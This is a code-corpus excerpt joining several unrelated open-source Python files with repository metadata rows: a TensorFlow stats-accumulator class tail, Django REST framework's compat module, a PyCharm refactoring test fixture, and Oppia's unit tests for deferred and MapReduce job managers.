self._resource_handle, stamp_token, gradient_shape.as_list(),
hessian_shape.as_list())
is_initialized_op = (
gen_stats_accumulator_ops.stats_accumulator_tensor_is_initialized(
self._resource_handle))
self._create_op = create_op
slice_spec = ""
saver_name = self._resource_handle.name
(stamp_token, num_updates, partition_ids, feature_ids, gradients,
hessians) = self.serialize()
specs = [
saver.BaseSaverBuilder.SaveSpec(stamp_token, slice_spec,
saver_name + "_stamp"),
saver.BaseSaverBuilder.SaveSpec(num_updates, slice_spec,
saver_name + "_num_updates"),
saver.BaseSaverBuilder.SaveSpec(partition_ids, slice_spec,
saver_name + "_partition_ids"),
saver.BaseSaverBuilder.SaveSpec(feature_ids, slice_spec,
saver_name + "_feature_ids"),
saver.BaseSaverBuilder.SaveSpec(gradients, slice_spec,
saver_name + "_gradients"),
saver.BaseSaverBuilder.SaveSpec(hessians, slice_spec,
saver_name + "hessians"),
]
super(StatsAccumulator, self).__init__(self._resource_handle, specs, name)
resources.register_resource(self._resource_handle, create_op,
is_initialized_op)
ops.add_to_collection(ops.GraphKeys.SAVEABLE_OBJECTS, self)
def add(self, stamp_token, partition_ids, feature_ids, gradients, hessians):
"""Updates the stats accumulator."""
partition_ids, feature_ids, gradients, hessians = (self._make_summary(
partition_ids, feature_ids, gradients, hessians))
if self._is_scalar:
return gen_stats_accumulator_ops.stats_accumulator_scalar_add(
[self._resource_handle], stamp_token, [partition_ids], [feature_ids],
[gradients], [hessians])
else:
return gen_stats_accumulator_ops.stats_accumulator_tensor_add(
[self._resource_handle], stamp_token, [partition_ids], [feature_ids],
[gradients], [hessians])
def schedule_add(self, partition_ids, feature_ids, gradients, hessians):
"""Schedules an update to the stats accumulator."""
partition_ids, feature_ids, gradients, hessians = (self._make_summary(
partition_ids, feature_ids, gradients, hessians))
if self._is_scalar:
return batch_ops_utils.ScheduledStampedResourceOp(
op=gen_stats_accumulator_ops.stats_accumulator_scalar_add,
resource_handle=self._resource_handle,
partition_ids=partition_ids,
feature_ids=feature_ids,
gradients=gradients,
hessians=hessians)
else:
return batch_ops_utils.ScheduledStampedResourceOp(
op=gen_stats_accumulator_ops.stats_accumulator_tensor_add,
resource_handle=self._resource_handle,
partition_ids=partition_ids,
feature_ids=feature_ids,
gradients=gradients,
hessians=hessians)
def _make_summary(self, partition_ids, feature_ids, gradients, hessians):
if self._is_scalar:
return gen_stats_accumulator_ops.stats_accumulator_scalar_make_summary(
partition_ids, feature_ids, gradients, hessians)
else:
return gen_stats_accumulator_ops.stats_accumulator_tensor_make_summary(
partition_ids, feature_ids, gradients, hessians)
def deserialize(self, stamp_token, num_updates, partition_ids, feature_ids,
gradients, hessians):
"""Resets the stats accumulator with the serialized state."""
if self._is_scalar:
return gen_stats_accumulator_ops.stats_accumulator_scalar_deserialize(
self._resource_handle, stamp_token, num_updates, partition_ids,
feature_ids, gradients, hessians)
else:
return gen_stats_accumulator_ops.stats_accumulator_tensor_deserialize(
self._resource_handle, stamp_token, num_updates, partition_ids,
feature_ids, gradients, hessians)
def flush(self, stamp_token, next_stamp_token):
"""Flushes the stats accumulator."""
if self._is_scalar:
return gen_stats_accumulator_ops.stats_accumulator_scalar_flush(
self._resource_handle, stamp_token, next_stamp_token)
else:
return gen_stats_accumulator_ops.stats_accumulator_tensor_flush(
self._resource_handle, stamp_token, next_stamp_token)
def serialize(self):
"""Serializes the stats accumulator state."""
if self._is_scalar:
return gen_stats_accumulator_ops.stats_accumulator_scalar_serialize(
self._resource_handle)
else:
return gen_stats_accumulator_ops.stats_accumulator_tensor_serialize(
self._resource_handle)
def restore(self, restored_tensors, unused_restored_shapes):
"""Restores the associated tree ensemble from 'restored_tensors'.
Args:
restored_tensors: the tensors that were loaded from a checkpoint.
unused_restored_shapes: the shapes this object should conform to after
restore. Not meaningful for trees.
Returns:
The operation that restores the state of the tree ensemble variable.
"""
with ops.control_dependencies([self._create_op]):
return self.deserialize(
stamp_token=restored_tensors[0],
num_updates=restored_tensors[1],
partition_ids=restored_tensors[2],
feature_ids=restored_tensors[3],
gradients=restored_tensors[4],
hessians=restored_tensors[5])
def resource(self):
return self._resource_handle
| mit | 1,865,877,822,511,427,600 | 43.497585 | 81 | 0.656063 | false |
devs1991/test_edx_docmode | venv/lib/python2.7/site-packages/rest_framework/compat.py | 29 | 7549 | """
The `compat` module provides support for backwards compatibility with older
versions of Django/Python, and compatibility wrappers around optional packages.
"""
# flake8: noqa
from __future__ import unicode_literals
import django
from django.conf import settings
from django.db import connection, transaction
from django.utils import six
from django.views.generic import View
try:
import importlib # Available in Python 3.1+
except ImportError:
from django.utils import importlib # Will be removed in Django 1.9
def unicode_repr(instance):
# Get the repr of an instance, but ensure it is a unicode string
# on both python 3 (already the case) and 2 (not the case).
if six.PY2:
return repr(instance).decode('utf-8')
return repr(instance)
def unicode_to_repr(value):
# Coerce a unicode string to the correct repr return type, depending on
# the Python version. We wrap all our `__repr__` implementations with
# this and then use unicode throughout internally.
if six.PY2:
return value.encode('utf-8')
return value
def unicode_http_header(value):
# Coerce HTTP header value to unicode.
if isinstance(value, six.binary_type):
return value.decode('iso-8859-1')
return value
def total_seconds(timedelta):
# TimeDelta.total_seconds() is only available in Python 2.7
if hasattr(timedelta, 'total_seconds'):
return timedelta.total_seconds()
else:
return (timedelta.days * 86400.0) + float(timedelta.seconds) + (timedelta.microseconds / 1000000.0)
def distinct(queryset, base):
if settings.DATABASES[queryset.db]["ENGINE"] == "django.db.backends.oracle":
# distinct analogue for Oracle users
return base.filter(pk__in=set(queryset.values_list('pk', flat=True)))
return queryset.distinct()
# OrderedDict only available in Python 2.7.
# This will always be the case in Django 1.7 and above, as these versions
# no longer support Python 2.6.
# For Django <= 1.6 and Python 2.6 fall back to SortedDict.
try:
from collections import OrderedDict
except ImportError:
from django.utils.datastructures import SortedDict as OrderedDict
# contrib.postgres only supported from 1.8 onwards.
try:
from django.contrib.postgres import fields as postgres_fields
except ImportError:
postgres_fields = None
# django-filter is optional
try:
import django_filters
except ImportError:
django_filters = None
if django.VERSION >= (1, 6):
def clean_manytomany_helptext(text):
return text
else:
# Up to version 1.5 many to many fields automatically suffix
# the `help_text` attribute with hardcoded text.
def clean_manytomany_helptext(text):
if text.endswith(' Hold down "Control", or "Command" on a Mac, to select more than one.'):
text = text[:-69]
return text
# Django-guardian is optional. Import only if guardian is in INSTALLED_APPS
# Fixes (#1712). We keep the try/except for the test suite.
guardian = None
try:
import guardian
import guardian.shortcuts # Fixes #1624
except ImportError:
pass
def get_model_name(model_cls):
try:
return model_cls._meta.model_name
except AttributeError:
# < 1.6 used module_name instead of model_name
return model_cls._meta.module_name
# MinValueValidator, MaxValueValidator et al. only accept `message` in 1.8+
if django.VERSION >= (1, 8):
from django.core.validators import MinValueValidator, MaxValueValidator
from django.core.validators import MinLengthValidator, MaxLengthValidator
else:
from django.core.validators import MinValueValidator as DjangoMinValueValidator
from django.core.validators import MaxValueValidator as DjangoMaxValueValidator
from django.core.validators import MinLengthValidator as DjangoMinLengthValidator
from django.core.validators import MaxLengthValidator as DjangoMaxLengthValidator
class MinValueValidator(DjangoMinValueValidator):
def __init__(self, *args, **kwargs):
self.message = kwargs.pop('message', self.message)
super(MinValueValidator, self).__init__(*args, **kwargs)
class MaxValueValidator(DjangoMaxValueValidator):
def __init__(self, *args, **kwargs):
self.message = kwargs.pop('message', self.message)
super(MaxValueValidator, self).__init__(*args, **kwargs)
class MinLengthValidator(DjangoMinLengthValidator):
def __init__(self, *args, **kwargs):
self.message = kwargs.pop('message', self.message)
super(MinLengthValidator, self).__init__(*args, **kwargs)
class MaxLengthValidator(DjangoMaxLengthValidator):
def __init__(self, *args, **kwargs):
self.message = kwargs.pop('message', self.message)
super(MaxLengthValidator, self).__init__(*args, **kwargs)
# URLValidator only accepts `message` in 1.6+
if django.VERSION >= (1, 6):
from django.core.validators import URLValidator
else:
from django.core.validators import URLValidator as DjangoURLValidator
class URLValidator(DjangoURLValidator):
def __init__(self, *args, **kwargs):
self.message = kwargs.pop('message', self.message)
super(URLValidator, self).__init__(*args, **kwargs)
# EmailValidator requires explicit regex prior to 1.6+
if django.VERSION >= (1, 6):
from django.core.validators import EmailValidator
else:
from django.core.validators import EmailValidator as DjangoEmailValidator
from django.core.validators import email_re
class EmailValidator(DjangoEmailValidator):
def __init__(self, *args, **kwargs):
super(EmailValidator, self).__init__(email_re, *args, **kwargs)
# PATCH method is not implemented by Django
if 'patch' not in View.http_method_names:
View.http_method_names = View.http_method_names + ['patch']
# Markdown is optional
try:
import markdown
def apply_markdown(text):
"""
Simple wrapper around :func:`markdown.markdown` to set the base level
of '#' style headers to <h2>.
"""
extensions = ['headerid(level=2)']
safe_mode = False
md = markdown.Markdown(extensions=extensions, safe_mode=safe_mode)
return md.convert(text)
except ImportError:
apply_markdown = None
# `separators` argument to `json.dumps()` differs between 2.x and 3.x
# See: http://bugs.python.org/issue22767
if six.PY3:
SHORT_SEPARATORS = (',', ':')
LONG_SEPARATORS = (', ', ': ')
INDENT_SEPARATORS = (',', ': ')
else:
SHORT_SEPARATORS = (b',', b':')
LONG_SEPARATORS = (b', ', b': ')
INDENT_SEPARATORS = (b',', b': ')
if django.VERSION >= (1, 8):
from django.db.models import DurationField
from django.utils.dateparse import parse_duration
from django.utils.duration import duration_string
else:
DurationField = duration_string = parse_duration = None
def set_rollback():
if hasattr(transaction, 'set_rollback'):
if connection.settings_dict.get('ATOMIC_REQUESTS', False):
# If running in >=1.6 then mark a rollback as required,
# and allow it to be handled by Django.
if connection.in_atomic_block:
transaction.set_rollback(True)
elif transaction.is_managed():
# Otherwise handle it explicitly if in managed mode.
if transaction.is_dirty():
transaction.rollback()
transaction.leave_transaction_management()
else:
# transaction not managed
pass
| agpl-3.0 | 2,562,711,023,433,366,000 | 31.821739 | 107 | 0.686581 | false |
MichaelNedzelsky/intellij-community | python/testData/refactoring/pullup/pyPullUpInfoModel.py | 80 | 1827 | class EmptyParent:pass
class SomeParent:
PARENT_CLASS_FIELD = 42
def __init__(self):
self.parent_instance_field = "egg"
def parent_func(self):
pass
class ChildWithDependencies(SomeParent, EmptyParent):
CLASS_FIELD_FOO = 42
CLASS_FIELD_DEPENDS_ON_CLASS_FIELD_FOO = CLASS_FIELD_FOO
CLASS_FIELD_DEPENDS_ON_PARENT_FIELD = SomeParent.PARENT_CLASS_FIELD
def __init__(self):
SomeParent.__init__(self)
self.instance_field_bar = 42
self.depends_on_instance_field_bar = self.instance_field_bar
self.depends_on_class_field_foo = ChildWithDependencies.CLASS_FIELD_FOO
@property
def new_property(self):
return 1
def _set_prop(self, val):
pass
def _get_prop(self):
return 1
def _del_prop(self):
pass
old_property = property(fset=_set_prop)
old_property_2 = property(fget=_get_prop)
old_property_3 = property(fdel=_del_prop)
@property
def new_property(self):
return 1
@new_property.setter
def new_property(self, val):
pass
@property
def new_property_2(self):
return 1
def normal_method(self):
pass
def method_depends_on_parent_method(self):
self.parent_func()
pass
def method_depends_on_parent_field(self):
i = self.parent_instance_field
pass
def method_depends_on_normal_method(self):
self.normal_method()
def method_depends_on_instance_field_bar(self):
eggs = self.instance_field_bar
def method_depends_on_old_property(self):
i = 12
self.old_property = i
q = self.old_property_2
del self.old_property_3
def method_depends_on_new_property(self):
self.new_property = 12
print(self.new_property_2)
| apache-2.0 | -5,834,207,651,409,390,000 | 21.280488 | 79 | 0.621237 | false |
MaximLich/oppia | core/jobs_test.py | 13 | 34314 | # coding: utf-8
#
# Copyright 2014 The Oppia Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS-IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for long running jobs and continuous computations."""
import ast
from core import jobs
from core import jobs_registry
from core.domain import event_services
from core.domain import exp_domain
from core.domain import exp_services
from core.platform import models
from core.tests import test_utils
import feconf
from google.appengine.ext import ndb
(base_models, exp_models, stats_models) = models.Registry.import_models([
models.NAMES.base_model, models.NAMES.exploration, models.NAMES.statistics])
taskqueue_services = models.Registry.import_taskqueue_services()
transaction_services = models.Registry.import_transaction_services()
JOB_FAILED_MESSAGE = 'failed (as expected)'
class DummyJobManager(jobs.BaseDeferredJobManager):
@classmethod
def _run(cls, additional_job_params):
return 'output'
class AnotherDummyJobManager(jobs.BaseDeferredJobManager):
@classmethod
def _run(cls, additional_job_params):
return 'output'
class DummyJobManagerWithParams(jobs.BaseDeferredJobManager):
@classmethod
def _run(cls, additional_job_params):
return additional_job_params['correct']
class DummyFailingJobManager(jobs.BaseDeferredJobManager):
@classmethod
def _run(cls, additional_job_params):
raise Exception(JOB_FAILED_MESSAGE)
class JobWithNoRunMethodManager(jobs.BaseDeferredJobManager):
pass
class JobManagerUnitTests(test_utils.GenericTestBase):
"""Test basic job manager operations."""
def test_create_new(self):
"""Test the creation of a new job."""
job_id = DummyJobManager.create_new()
self.assertTrue(job_id.startswith('DummyJob'))
self.assertEqual(
DummyJobManager.get_status_code(job_id), jobs.STATUS_CODE_NEW)
self.assertIsNone(DummyJobManager.get_time_queued_msec(job_id))
self.assertIsNone(DummyJobManager.get_time_started_msec(job_id))
self.assertIsNone(DummyJobManager.get_time_finished_msec(job_id))
self.assertIsNone(DummyJobManager.get_metadata(job_id))
self.assertIsNone(DummyJobManager.get_output(job_id))
self.assertIsNone(DummyJobManager.get_error(job_id))
self.assertFalse(DummyJobManager.is_active(job_id))
self.assertFalse(DummyJobManager.has_finished(job_id))
def test_enqueue_job(self):
"""Test the enqueueing of a job."""
job_id = DummyJobManager.create_new()
DummyJobManager.enqueue(job_id)
self.assertEqual(self.count_jobs_in_taskqueue(), 1)
self.assertEqual(
DummyJobManager.get_status_code(job_id), jobs.STATUS_CODE_QUEUED)
self.assertIsNotNone(DummyJobManager.get_time_queued_msec(job_id))
self.assertIsNone(DummyJobManager.get_output(job_id))
def test_failure_for_job_enqueued_using_wrong_manager(self):
job_id = DummyJobManager.create_new()
with self.assertRaisesRegexp(Exception, 'Invalid job type'):
AnotherDummyJobManager.enqueue(job_id)
def test_failure_for_job_with_no_run_method(self):
job_id = JobWithNoRunMethodManager.create_new()
JobWithNoRunMethodManager.enqueue(job_id)
self.assertEqual(self.count_jobs_in_taskqueue(), 1)
with self.assertRaisesRegexp(Exception, 'NotImplementedError'):
self.process_and_flush_pending_tasks()
def test_complete_job(self):
job_id = DummyJobManager.create_new()
DummyJobManager.enqueue(job_id)
self.assertEqual(self.count_jobs_in_taskqueue(), 1)
self.process_and_flush_pending_tasks()
self.assertEqual(
DummyJobManager.get_status_code(job_id),
jobs.STATUS_CODE_COMPLETED)
time_queued_msec = DummyJobManager.get_time_queued_msec(job_id)
time_started_msec = DummyJobManager.get_time_started_msec(job_id)
time_finished_msec = DummyJobManager.get_time_finished_msec(job_id)
self.assertIsNotNone(time_queued_msec)
self.assertIsNotNone(time_started_msec)
self.assertIsNotNone(time_finished_msec)
self.assertLess(time_queued_msec, time_started_msec)
self.assertLess(time_started_msec, time_finished_msec)
metadata = DummyJobManager.get_metadata(job_id)
output = DummyJobManager.get_output(job_id)
error = DummyJobManager.get_error(job_id)
self.assertIsNone(metadata)
self.assertEqual(output, 'output')
self.assertIsNone(error)
self.assertFalse(DummyJobManager.is_active(job_id))
self.assertTrue(DummyJobManager.has_finished(job_id))
def test_deferred_job_with_additional_params(self):
"""Test the enqueueing of a job with additional parameters."""
job_id_1 = DummyJobManagerWithParams.create_new()
DummyJobManagerWithParams.enqueue(
job_id_1, additional_job_params={'random': 3, 'correct': 60})
job_id_2 = DummyJobManagerWithParams.create_new()
DummyJobManagerWithParams.enqueue(
job_id_2, additional_job_params={'random': 20, 'correct': 25})
self.assertEqual(self.count_jobs_in_taskqueue(), 2)
self.process_and_flush_pending_tasks()
self.assertTrue(DummyJobManagerWithParams.has_finished(job_id_1))
self.assertEqual(DummyJobManagerWithParams.get_output(job_id_1), 60)
self.assertTrue(DummyJobManagerWithParams.has_finished(job_id_2))
self.assertEqual(DummyJobManagerWithParams.get_output(job_id_2), 25)
def test_job_failure(self):
job_id = DummyFailingJobManager.create_new()
DummyFailingJobManager.enqueue(job_id)
self.assertEqual(self.count_jobs_in_taskqueue(), 1)
with self.assertRaisesRegexp(Exception, 'Task failed'):
self.process_and_flush_pending_tasks()
self.assertEqual(
DummyFailingJobManager.get_status_code(job_id),
jobs.STATUS_CODE_FAILED)
time_queued_msec = DummyFailingJobManager.get_time_queued_msec(job_id)
time_started_msec = DummyFailingJobManager.get_time_started_msec(
job_id)
time_finished_msec = DummyFailingJobManager.get_time_finished_msec(
job_id)
self.assertIsNotNone(time_queued_msec)
self.assertIsNotNone(time_started_msec)
self.assertIsNotNone(time_finished_msec)
self.assertLess(time_queued_msec, time_started_msec)
self.assertLess(time_started_msec, time_finished_msec)
metadata = DummyFailingJobManager.get_metadata(job_id)
output = DummyFailingJobManager.get_output(job_id)
error = DummyFailingJobManager.get_error(job_id)
self.assertIsNone(metadata)
self.assertIsNone(output)
self.assertIn(JOB_FAILED_MESSAGE, error)
self.assertFalse(DummyFailingJobManager.is_active(job_id))
self.assertTrue(DummyFailingJobManager.has_finished(job_id))
def test_status_code_transitions(self):
"""Test that invalid status code transitions are caught."""
job_id = DummyJobManager.create_new()
DummyJobManager.enqueue(job_id)
DummyJobManager.register_start(job_id)
DummyJobManager.register_completion(job_id, 'output')
with self.assertRaisesRegexp(Exception, 'Invalid status code change'):
DummyJobManager.enqueue(job_id)
with self.assertRaisesRegexp(Exception, 'Invalid status code change'):
DummyJobManager.register_completion(job_id, 'output')
with self.assertRaisesRegexp(Exception, 'Invalid status code change'):
DummyJobManager.register_failure(job_id, 'error')
def test_different_jobs_are_independent(self):
job_id = DummyJobManager.create_new()
another_job_id = AnotherDummyJobManager.create_new()
DummyJobManager.enqueue(job_id)
DummyJobManager.register_start(job_id)
AnotherDummyJobManager.enqueue(another_job_id)
self.assertEqual(
DummyJobManager.get_status_code(job_id), jobs.STATUS_CODE_STARTED)
self.assertEqual(
AnotherDummyJobManager.get_status_code(another_job_id),
jobs.STATUS_CODE_QUEUED)
def test_cannot_instantiate_jobs_from_abstract_base_classes(self):
with self.assertRaisesRegexp(
Exception, 'directly create a job using the abstract base'
):
jobs.BaseJobManager.create_new()
def test_cannot_enqueue_same_job_twice(self):
job_id = DummyJobManager.create_new()
DummyJobManager.enqueue(job_id)
with self.assertRaisesRegexp(Exception, 'Invalid status code change'):
DummyJobManager.enqueue(job_id)
def test_can_enqueue_two_instances_of_the_same_job(self):
job_id = DummyJobManager.create_new()
DummyJobManager.enqueue(job_id)
job_id_2 = DummyJobManager.create_new()
DummyJobManager.enqueue(job_id_2)
def test_cancel_kills_queued_job(self):
job_id = DummyJobManager.create_new()
DummyJobManager.enqueue(job_id)
self.assertTrue(DummyJobManager.is_active(job_id))
DummyJobManager.cancel(job_id, 'admin_user_id')
self.assertFalse(DummyJobManager.is_active(job_id))
self.assertEquals(
DummyJobManager.get_status_code(job_id), jobs.STATUS_CODE_CANCELED)
self.assertIsNone(DummyJobManager.get_output(job_id))
self.assertEquals(
DummyJobManager.get_error(job_id), 'Canceled by admin_user_id')
def test_cancel_kills_started_job(self):
job_id = DummyJobManager.create_new()
DummyJobManager.enqueue(job_id)
self.assertTrue(DummyJobManager.is_active(job_id))
DummyJobManager.register_start(job_id)
# Cancel the job immediately after it has started.
DummyJobManager.cancel(job_id, 'admin_user_id')
# The job then finishes.
with self.assertRaisesRegexp(Exception, 'Invalid status code change'):
DummyJobManager.register_completion(job_id, 'job_output')
self.assertFalse(DummyJobManager.is_active(job_id))
self.assertEquals(
DummyJobManager.get_status_code(job_id), jobs.STATUS_CODE_CANCELED)
# Note that no results are recorded for this job.
self.assertIsNone(DummyJobManager.get_output(job_id))
self.assertEquals(
DummyJobManager.get_error(job_id), 'Canceled by admin_user_id')
def test_cancel_does_not_kill_completed_job(self):
job_id = DummyJobManager.create_new()
DummyJobManager.enqueue(job_id)
self.assertTrue(DummyJobManager.is_active(job_id))
# Complete the job.
self.process_and_flush_pending_tasks()
self.assertFalse(DummyJobManager.is_active(job_id))
self.assertEquals(
DummyJobManager.get_status_code(job_id),
jobs.STATUS_CODE_COMPLETED)
# Cancel the job after it has finished.
with self.assertRaisesRegexp(Exception, 'Invalid status code change'):
DummyJobManager.cancel(job_id, 'admin_user_id')
# The job should still have 'completed' status.
self.assertFalse(DummyJobManager.is_active(job_id))
self.assertEquals(
DummyJobManager.get_status_code(job_id),
jobs.STATUS_CODE_COMPLETED)
self.assertEquals(DummyJobManager.get_output(job_id), 'output')
self.assertIsNone(DummyJobManager.get_error(job_id))
def test_cancel_does_not_kill_failed_job(self):
job_id = DummyFailingJobManager.create_new()
DummyFailingJobManager.enqueue(job_id)
self.assertTrue(DummyFailingJobManager.is_active(job_id))
with self.assertRaisesRegexp(Exception, 'Task failed'):
self.process_and_flush_pending_tasks()
self.assertFalse(DummyFailingJobManager.is_active(job_id))
self.assertEquals(
DummyFailingJobManager.get_status_code(job_id),
jobs.STATUS_CODE_FAILED)
# Cancel the job after it has finished.
with self.assertRaisesRegexp(Exception, 'Invalid status code change'):
DummyFailingJobManager.cancel(job_id, 'admin_user_id')
# The job should still have 'failed' status.
self.assertFalse(DummyFailingJobManager.is_active(job_id))
self.assertEquals(
DummyFailingJobManager.get_status_code(job_id),
jobs.STATUS_CODE_FAILED)
self.assertIsNone(DummyFailingJobManager.get_output(job_id))
self.assertIn(
'raise Exception', DummyFailingJobManager.get_error(job_id))
def test_cancelling_multiple_unfinished_jobs(self):
job1_id = DummyJobManager.create_new()
DummyJobManager.enqueue(job1_id)
job2_id = DummyJobManager.create_new()
DummyJobManager.enqueue(job2_id)
DummyJobManager.register_start(job1_id)
DummyJobManager.register_start(job2_id)
DummyJobManager.cancel_all_unfinished_jobs('admin_user_id')
self.assertFalse(DummyJobManager.is_active(job1_id))
self.assertFalse(DummyJobManager.is_active(job2_id))
self.assertEquals(
DummyJobManager.get_status_code(job1_id),
jobs.STATUS_CODE_CANCELED)
self.assertEquals(
DummyJobManager.get_status_code(job2_id),
jobs.STATUS_CODE_CANCELED)
self.assertIsNone(DummyJobManager.get_output(job1_id))
self.assertIsNone(DummyJobManager.get_output(job2_id))
self.assertEquals(
'Canceled by admin_user_id', DummyJobManager.get_error(job1_id))
self.assertEquals(
'Canceled by admin_user_id', DummyJobManager.get_error(job2_id))
def test_cancelling_one_unfinished_job(self):
job1_id = DummyJobManager.create_new()
DummyJobManager.enqueue(job1_id)
job2_id = DummyJobManager.create_new()
DummyJobManager.enqueue(job2_id)
DummyJobManager.register_start(job1_id)
DummyJobManager.register_start(job2_id)
DummyJobManager.cancel(job1_id, 'admin_user_id')
with self.assertRaisesRegexp(Exception, 'Invalid status code change'):
self.process_and_flush_pending_tasks()
DummyJobManager.register_completion(job2_id, 'output')
self.assertFalse(DummyJobManager.is_active(job1_id))
self.assertFalse(DummyJobManager.is_active(job2_id))
self.assertEquals(
DummyJobManager.get_status_code(job1_id),
jobs.STATUS_CODE_CANCELED)
self.assertEquals(
DummyJobManager.get_status_code(job2_id),
jobs.STATUS_CODE_COMPLETED)
self.assertIsNone(DummyJobManager.get_output(job1_id))
self.assertEquals(DummyJobManager.get_output(job2_id), 'output')
self.assertEquals(
'Canceled by admin_user_id', DummyJobManager.get_error(job1_id))
self.assertIsNone(DummyJobManager.get_error(job2_id))
SUM_MODEL_ID = 'all_data_id'
class NumbersModel(ndb.Model):
number = ndb.IntegerProperty()
class SumModel(ndb.Model):
total = ndb.IntegerProperty(default=0)
failed = ndb.BooleanProperty(default=False)
class TestDeferredJobManager(jobs.BaseDeferredJobManager):
"""Base class for testing deferred jobs."""
pass
class TestAdditionJobManager(TestDeferredJobManager):
"""Test job that sums all NumbersModel data.
The result is stored in a SumModel entity with id SUM_MODEL_ID.
"""
@classmethod
def _run(cls, additional_job_params):
total = sum([
numbers_model.number for numbers_model in NumbersModel.query()])
SumModel(id=SUM_MODEL_ID, total=total).put()
class FailingAdditionJobManager(TestDeferredJobManager):
"""Test job that stores stuff in SumModel and then fails."""
@classmethod
def _run(cls, additional_job_params):
total = sum([
numbers_model.number for numbers_model in NumbersModel.query()])
SumModel(id=SUM_MODEL_ID, total=total).put()
raise Exception('Oops, I failed.')
@classmethod
def _post_failure_hook(cls, job_id):
model = SumModel.get_by_id(SUM_MODEL_ID)
model.failed = True
model.put()
class DatastoreJobIntegrationTests(test_utils.GenericTestBase):
"""Tests the behavior of a job that affects data in the datastore.
This job gets all NumbersModel instances and sums their values, and puts
the summed values in a SumModel instance with id SUM_MODEL_ID. The
computation is redone from scratch each time the job is run.
"""
def _get_stored_total(self):
sum_model = SumModel.get_by_id(SUM_MODEL_ID)
return sum_model.total if sum_model else 0
def _populate_data(self):
"""Populate the datastore with four NumbersModel instances."""
NumbersModel(number=1).put()
NumbersModel(number=2).put()
NumbersModel(number=1).put()
NumbersModel(number=2).put()
def test_sequential_jobs(self):
self._populate_data()
self.assertEqual(self._get_stored_total(), 0)
TestAdditionJobManager.enqueue(
TestAdditionJobManager.create_new())
self.assertEqual(self.count_jobs_in_taskqueue(), 1)
self.process_and_flush_pending_tasks()
self.assertEqual(self._get_stored_total(), 6)
NumbersModel(number=3).put()
TestAdditionJobManager.enqueue(
TestAdditionJobManager.create_new())
self.assertEqual(self.count_jobs_in_taskqueue(), 1)
self.process_and_flush_pending_tasks()
self.assertEqual(self._get_stored_total(), 9)
def test_multiple_enqueued_jobs(self):
self._populate_data()
TestAdditionJobManager.enqueue(
TestAdditionJobManager.create_new())
NumbersModel(number=3).put()
TestAdditionJobManager.enqueue(
TestAdditionJobManager.create_new())
self.assertEqual(self.count_jobs_in_taskqueue(), 2)
self.process_and_flush_pending_tasks()
self.assertEqual(self._get_stored_total(), 9)
def test_failing_job(self):
self._populate_data()
job_id = FailingAdditionJobManager.create_new()
FailingAdditionJobManager.enqueue(job_id)
self.assertEqual(self.count_jobs_in_taskqueue(), 1)
with self.assertRaisesRegexp(
taskqueue_services.PermanentTaskFailure, 'Oops, I failed'
):
self.process_and_flush_pending_tasks()
# The work that the failing job did before it failed is still done.
self.assertEqual(self._get_stored_total(), 6)
# The post-failure hook should have run.
self.assertTrue(SumModel.get_by_id(SUM_MODEL_ID).failed)
self.assertTrue(
FailingAdditionJobManager.get_status_code(job_id),
jobs.STATUS_CODE_FAILED)
class SampleMapReduceJobManager(jobs.BaseMapReduceJobManager):
"""Test job that counts the total number of explorations."""
@classmethod
def entity_classes_to_map_over(cls):
return [exp_models.ExplorationModel]
@staticmethod
def map(item):
yield ('sum', 1)
@staticmethod
def reduce(key, values):
yield (key, sum([int(value) for value in values]))
class MapReduceJobIntegrationTests(test_utils.GenericTestBase):
"""Tests MapReduce jobs end-to-end."""
def setUp(self):
"""Create an exploration so that there is something to count."""
super(MapReduceJobIntegrationTests, self).setUp()
exploration = exp_domain.Exploration.create_default_exploration(
'exp_id')
exp_services.save_new_exploration('owner_id', exploration)
self.process_and_flush_pending_tasks()
def test_count_all_explorations(self):
job_id = SampleMapReduceJobManager.create_new()
SampleMapReduceJobManager.enqueue(job_id)
self.assertEqual(self.count_jobs_in_taskqueue(), 1)
self.process_and_flush_pending_tasks()
self.assertEqual(
SampleMapReduceJobManager.get_output(job_id), [['sum', 1]])
self.assertEqual(
SampleMapReduceJobManager.get_status_code(job_id),
jobs.STATUS_CODE_COMPLETED)
class JobRegistryTests(test_utils.GenericTestBase):
"""Tests job registry."""
def test_each_one_off_class_is_subclass_of_base_job_manager(self):
for klass in jobs_registry.ONE_OFF_JOB_MANAGERS:
self.assertTrue(issubclass(klass, jobs.BaseJobManager))
def test_each_one_off_class_is_not_abstract(self):
for klass in jobs_registry.ONE_OFF_JOB_MANAGERS:
self.assertFalse(klass._is_abstract()) # pylint: disable=protected-access
def test_validity_of_each_continuous_computation_class(self):
for klass in jobs_registry.ALL_CONTINUOUS_COMPUTATION_MANAGERS:
self.assertTrue(
issubclass(klass, jobs.BaseContinuousComputationManager))
event_types_listened_to = klass.get_event_types_listened_to()
self.assertTrue(isinstance(event_types_listened_to, list))
for event_type in event_types_listened_to:
self.assertTrue(isinstance(event_type, basestring))
self.assertTrue(issubclass(
event_services.Registry.get_event_class_by_type(
event_type),
event_services.BaseEventHandler))
rdc = klass._get_realtime_datastore_class() # pylint: disable=protected-access
self.assertTrue(issubclass(
rdc, jobs.BaseRealtimeDatastoreClassForContinuousComputations))
# The list of allowed base classes. This can be extended as the
# need arises, though we may also want to implement
# _get_continuous_computation_class() and
# _entity_created_before_job_queued() for other base classes
# that are added to this list.
allowed_base_batch_job_classes = [
jobs.BaseMapReduceJobManagerForContinuousComputations]
self.assertTrue(any([
issubclass(klass._get_batch_job_manager_class(), superclass) # pylint: disable=protected-access
for superclass in allowed_base_batch_job_classes]))
class JobQueriesTests(test_utils.GenericTestBase):
"""Tests queries for jobs."""
def test_get_data_for_recent_jobs(self):
self.assertEqual(jobs.get_data_for_recent_jobs(), [])
job_id = DummyJobManager.create_new()
DummyJobManager.enqueue(job_id)
recent_jobs = jobs.get_data_for_recent_jobs()
self.assertEqual(len(recent_jobs), 1)
self.assertDictContainsSubset({
'id': job_id,
'status_code': jobs.STATUS_CODE_QUEUED,
'job_type': 'DummyJobManager',
'is_cancelable': True,
'error': None
}, recent_jobs[0])
class TwoClassesMapReduceJobManager(jobs.BaseMapReduceJobManager):
"""A test job handler that counts entities in two datastore classes."""
@classmethod
def entity_classes_to_map_over(cls):
